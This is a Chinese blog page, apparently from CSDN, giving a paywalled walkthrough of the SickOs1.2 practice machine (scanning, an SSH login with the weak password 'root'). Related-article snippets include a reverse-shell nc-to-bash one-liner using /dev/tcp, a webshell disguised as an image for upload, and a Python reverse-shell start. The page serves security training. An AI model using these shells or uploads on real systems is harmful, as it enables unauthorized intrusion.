靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地提权

最新推荐文章于 2024-08-08 21:06:47 发布
最新推荐文章于 2024-08-08 21:06:47 发布
阅读量1.4k 收藏 8
点赞数
分类专栏: 渗透学习 靶机练习 文章标签: 靶机SickOs1.2练习 上传马文件菜刀连接/反弹shell,进行本地提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41210745/article/details/103962530
版权
本文详细介绍了在SickOs1.2靶机上的提权过程,包括通过ssh弱口令提权、利用菜刀上传马文件getshell、尝试反弹shell及msfvenom生成反弹shell,同时讨论了使用chkrootkit工具进行提权的步骤,尽管最后未能成功,但提供了其他提权方法的参考资料。
摘要由CSDN通过智能技术生成

1.主机发现

2.信息扫描

指纹信息

3.端口访问

该页面未发现有效信息

尝试ssh弱口令连接,密码为root,直接提权成功!

4.目录扫描

未发现有效路径

有一个test目录,访问看看

最低0.47元/天 解锁文章
7Riven
关注
专栏目录
中国菜刀使用(实战正确姿势)
weixin_49071539的博客
12-17 1万+
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片,随便找到一张图片重命名为1.jpg 2. 准备好一句话木,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
反弹shell上传文件
技术超强的网络安全平台
12-10 1385
转载于:https://www.freebuf.com/articles/system/178515.html 在本文中,我将介绍一款自己编写的小工具NcPutter,并用它来实现在只有bash反弹shell情况下的文件上传。在渗透测试过程中,我们可能会遇到这样一种情景,即已将让目标机通过bash反弹shell与我们的机器建立了连接,需要向目标机上上传或其他可执行文件来做进一步提权进行内网渗透,很多人可能会采用在目标机上执行wget、ftp、curl、nc等工具命令获取相关可执行文件,可这些方法有以下
常见 反弹shell的方法
最新发布
qq_48368964的博客
08-08 1354
nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555 #从4444端口获取到命令,bash 运行后将命令执行结果返回 5555 端口,攻击者主机上也是打开两个终端分别执行监听。#/dev/tcp/x.x.x.x/port 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口。反弹shell成功后,在监听4444端口的终端中执行命令可以在另一个终端中看到命令执行结果。监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip。
ftp全局修改文件后缀名_文件上传漏洞靶机Writeup
weixin_39723102的博客
11-22 529
最近小白一直在学习代码审计,对于我这个没有代码审计的菜鸟来说确实是一件无比艰难的事情。但是今天不是说代码审计的事情,而是文件上传的东东 小白在对 writeup 上传靶机中发现,通审查源代码能够让我们更清晰的了解文件上传漏洞。话不多说,下面我们就开干。在下面的实验中可能会与这个靶机的顺序不一样。有什么不足,还望大佬多多指教。首先我们先准备一下实验环境:1、win102、wamp3、一句话...
菜刀php提权,靶机SickOs1.2练习上传文件菜刀连接/反弹shell进行本地提权
weixin_39796533的博客
03-19 508
1.主机发现 2.信息扫描 指纹信息 3.端口访问 该页面未发现有效信息尝试ssh弱口令连接,密码为root,直接提权成功! 4.目录扫描 未发现有效路径 有一个test目录,访问看看 点击文件,未发现有用信息方法一:可以尝试抓包,修改option为put,上传文件菜刀连接getshell 上传成功! 菜刀连接 方法二:获取反弹shell脚本文件进行监听,连接 上传文件靶机 开启监...
利用python模拟菜刀反弹shell绕过限制
weixin_30240349的博客
06-25 174
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',66...
靶机渗透SickOs1.2(非常详细,适合新手渗透)
君莫hacker的博客
09-08 7210
靶机HACKME:2的目录0x01靶机描述 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/sickos-12,144/ 作者 D4rk 发布日期 2016年4月27日 难度 中等 靶机基本介绍: 这是SickOs后续系列中的第二个,独立于以前的版本,挑战的范围是在系统上获得最高权限。 ...
靶机bulldog2练习:通过反弹shell进行提权
7Riven's blog
11-22 970
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149 扫描网段:发现有主机IP地址为192.168.109.149,存活 扫描发现目标的目标主机信息如下: -sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
7Riven's blog
01-29 938
1.主机发现 2.端口扫描 3.目录扫描 4.端口访问 尝试一下,含有文件包含漏洞 5.访问扫描出来的目录 发现登录端口,需要输入密码 尝试弱口令admin登录成功 信息查询,发现用户名、密码 md5解密试试,root用户密码为:34kroot34 zico用户密码为:zico2215@ 由于存在ssh服务端口,尝试连接 ...
靶机Bulldog练习:通过python脚本远程连接弹出shell进行提权
7Riven's blog
12-09 893
1.主机发现 方法一:netdiscover命令 netdiscover -i eth0 -r 192.168.109.0/24 主动,不扫描本机IP地址 netdiscover -p 被动,不容易被发现,只能扫到有交互的 -i 指定网卡 -r 指定网段 方法二:nmap命...
2021年江苏省职业院校技能大赛中职网络安全
PushSafe
04-04 2237
2021年江苏省职业院校技能大赛中职 网络信息安全赛项试卷(学生组) 一、 竞赛时间 共计180分钟。 二、 竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段单兵模式系统渗透测试 任务一 攻击日志分析 100分钟 10 任务二 系统漏洞利用与提权 10 任务三 代码审计 12 任务四 Web安全渗透测试 12 任务五 Linux操作系统渗透测试 12 任务六 端口扫描Python渗透测试 14 备战阶段 攻防对抗准备工作 20分钟 0 第二阶段分组对抗 系统加固 15分钟 3
中职网络安全操作系统渗透
m0_71635568的博客
11-30 1288
中职网络安全系统漏洞渗透
2022 年度广东省职业院校学生专业技能大赛网络安全(中职组)赛项样题
Jay
04-21 3842
2022 年度广东省职业院校学生专业技能大赛 网络安全(中职组)赛项样题 一、竞赛时间 总计:120 分钟 二、竞赛任务书内容( 1000 分) 任务一:系统漏洞利用与提权 任务环境说明:  服务器场景:Server1 1.使用 nmap 扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为 flag(形 式:[端口 1,端口 2…,端口 n])提交; 2.通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作 为 flag(形式:[用户名,密码
2021年江苏省职业院校技能大赛中职 “网络信息安全”赛项(超详细)
Aluxian_的博客
12-30 2359
2021年中职组“网络空间安全”赛项一.江苏省竞赛任务书二.任务书解析:三.不懂的可以私信博主! 一.江苏省竞赛任务书 一、竞赛时间 8:00—11:00 共计3小时 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第①阶段: 单兵模式系统渗透测试 任务一: 攻击日志分析 任务二: 系统漏洞利用与提权 任务三: 代码审计 任务四: web安全渗透测试 任务五: Linux操作系统渗透测试 任务六: 端口扫描Python渗透测试 备战阶段 休息20分钟 第②阶段: 分组对抗 系统加固 15分钟
2021年中职“网络安全“江西省赛题—B-3:应用服务漏洞扫描与利用
weixin_57060854的博客
05-25 3600
2021年中职"网络安全"江西省赛题—B-3:应用服务漏洞扫描与利用学习交流B-3:应用服务漏洞扫描与利用 学习交流 学习交流(要环境的可以滴滴),或者遇到不会的可以+qq:3455475542 B-3:应用服务漏洞扫描与利用 任务环境说明:  服务器场景:Server15  服务器场景操作系统:未知(关闭链接) 使用命令nmap探测目标靶机的服务版本信息,将需要使用的参数作为FLAG进行提交; nmap -sV ip 扫描 flag:[sV] 通过上述端口访问靶机系统并探测隐藏的页面,将找到的敏感
中职网络安全2022江西省B-2:应用服务漏洞扫描与利用 ssh私钥泄露
FRANXX_02的博客
10-05 517
中职网络安全2022湖南省B-4任务四:应用服务漏洞扫描与利用 ssh私钥泄露
记录一次win提权
m0_52149675的博客
04-16 193
我看见第六章的传送门上写着大大的两个字--提权!! 在上一章中,我已经通过上传一句话,用菜刀连接上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。 进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话至服务器了,如下图。 因此我直接来到了菜刀,进入了文件管...
Jangow靶机攻击实战教程:提权与权限升级
7. **反弹Shell**:为了更深入地渗透,攻击者尝试在目标站点上创建反弹Shell,通过NC在攻击机上监听端口,并上传包含恶意代码的whoami.php文件。 8. **权限提升**:由于当前权限限制,攻击者需要提权至Root账户,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值